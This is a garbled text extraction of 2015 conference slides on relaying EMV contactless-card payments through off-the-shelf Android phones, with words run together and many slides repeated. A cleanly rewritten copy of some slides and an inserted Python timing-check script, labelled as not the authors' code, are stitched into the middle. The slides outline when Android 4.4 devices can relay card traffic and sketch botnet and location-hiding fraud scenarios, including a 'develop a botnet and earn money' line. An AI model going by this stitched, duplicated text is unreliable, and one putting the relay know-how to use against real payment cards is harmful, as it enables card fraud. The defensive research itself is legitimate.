Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 35: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III): Threat Scenarios – Scenario 2

Hiding Fraud Locations

Relay Attack Implementation (IV): Resistant Mechanisms

Brief summary of resistant mechanisms:

• Distance-bounding protocols: upper-bounding the physical distance using the round-trip time of cryptographic challenge-response messages.
• Timing constraints: not enforced in current NFC-capable systems; the protocol itself allows timing-extension commands.
• Physical countermeasures:
  • Whitelisting/Blacklisting: random UID in HCE mode → unfeasible
  • RFID-blocking covers
  • Physical button/switch activation
  • Secondary authentication methods (e.g. on-card fingerprint scanners)
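As an added example (not code from the talk or its authors), the FWT formula from the "Limitation 3" slide and the timing-constraint countermeasure above worked through in Python: it computes FWT for every FWI and, on a constructed set of APDU round-trip times, flags the exchanges that overrun the budget the card declared, including the case where the card asked for a timing extension. The names Exchange and check_exchanges are mine; the WTXM multiplier range 1..59 for S(WTX) frames is taken from ISO/IEC 14443-4, and the sample timings are constructed, not measured.

```python
"""Reader-side timing check built on the ISO/IEC 14443-4 Frame Waiting Time.

Added example, not the authors' code. FWT = 256 * (16 / fc) * 2**FWI with
fc = 13.56 MHz and 0 <= FWI <= 14, exactly as stated on the slide.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

FC_HZ = 13.56e6  # ISO/IEC 14443 carrier frequency fc
MAX_FWI = 14     # largest FWI the standard allows


def fwt_seconds(fwi: int) -> float:
    """Frame Waiting Time in seconds for a given Frame Waiting Integer."""
    if not 0 <= fwi <= MAX_FWI:
        raise ValueError("FWI must be in 0..14")
    return 256 * (16 / FC_HZ) * (2 ** fwi)


def fwt_table() -> Dict[int, float]:
    """All 15 FWT values, from the shortest (FWI=0) to the longest (FWI=14)."""
    return {fwi: fwt_seconds(fwi) for fwi in range(MAX_FWI + 1)}


def max_relay_delay_seconds() -> float:
    """Largest round trip the protocol tolerates without a timing extension:
    the 'relay is possible when delay <= ~5 s' bound from the slide."""
    return fwt_seconds(MAX_FWI)


@dataclass
class Exchange:
    """One command/response pair as seen by the reader (hypothetical record)."""
    name: str      # label for the APDU, e.g. "SELECT PPSE"
    rtt_s: float   # measured time from command sent to response received
    wtxm: int = 1  # 1 = no S(WTX) request; otherwise the multiplier the card asked for


def check_exchanges(fwi: int, exchanges: List[Exchange]) -> List[Tuple[str, str]]:
    """Classify each exchange against the FWT the card declared in its ATS.

    Verdicts: 'ok'   - answered within FWT, no extension requested
              'wtx'  - answered within FWT * WTXM after a timing extension
              'late' - overran its budget (what a relay over a slow channel does)
    A reader enforcing timing would reject 'late' and could treat repeated
    'wtx' on simple commands as suspicious.
    """
    base = fwt_seconds(fwi)
    verdicts = []
    for ex in exchanges:
        if not 1 <= ex.wtxm <= 59:  # WTXM 0 and 60..63 are reserved
            raise ValueError("WTXM must be in 1..59")
        budget = base * ex.wtxm
        if ex.rtt_s > budget:
            verdicts.append((ex.name, "late"))
        elif ex.wtxm > 1:
            verdicts.append((ex.name, "wtx"))
        else:
            verdicts.append((ex.name, "ok"))
    return verdicts


# Constructed sample: a card declaring FWI=7 (about 38.7 ms), three APDUs.
SAMPLE_FWI = 7
SAMPLE_EXCHANGES = [
    Exchange("SELECT PPSE", rtt_s=0.012),                  # direct, well inside FWT
    Exchange("GET PROCESSING OPTIONS", rtt_s=0.095),       # relayed, overruns FWT
    Exchange("READ RECORD", rtt_s=0.120, wtxm=4),          # relayed, hidden by S(WTX)
]

if __name__ == "__main__":
    for fwi, t in fwt_table().items():
        print(f"FWI={fwi:2d}  FWT={t * 1e3:10.3f} ms")
    for name, verdict in check_exchanges(SAMPLE_FWI, SAMPLE_EXCHANGES):
        print(f"{name:24s} {verdict}")
```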


Related Work: On relay attacks

• 2005-2009: first works, built on specific hardware
• 2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
• 2012-2013: relay attacks on Android accessing Secure Elements. A SE securely stores the data associated with credit/debit cards. Needs a non-OTS Android device
• 2014: active relay attacks with custom hardware and custom Android firmware

Several works studied the delay over the relay channel: relaying over long distances is feasible → latency isn't a hard constraint.

Ask us for specific references: too many names for a single slide.


Conclusions (I)

• Security of NFC is based on the physical proximity concern
• NFC threats: eavesdropping, data modification, relay attacks
• Android NFC-capable devices are rising: they can be abused to interact with cards in their proximity

Conclusions:
• Review of the Android NFC stack
• Proof-of-Concept of relay attacks using Android OTS devices
• Threat scenarios introduced
• Virtual pickpocketing attacks may appear before long


Conclusions (II): But then, what the hell can I do? Should I run away?


Conclusions (III)

Future Work
• Develop a botnet infrastructure and earn money
• Timing constraints of Android HCE mode
• Try active relay attacks within EMV contactless cards

Acknowledgments
• Spanish National Cybersecurity Institute (INCIBE)
• University of León under contract X43
• HITB staff

And thanks to all for hearing us!

Visit http://vwzq.net/relaynfc for more info about the project.

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 36: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 37: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

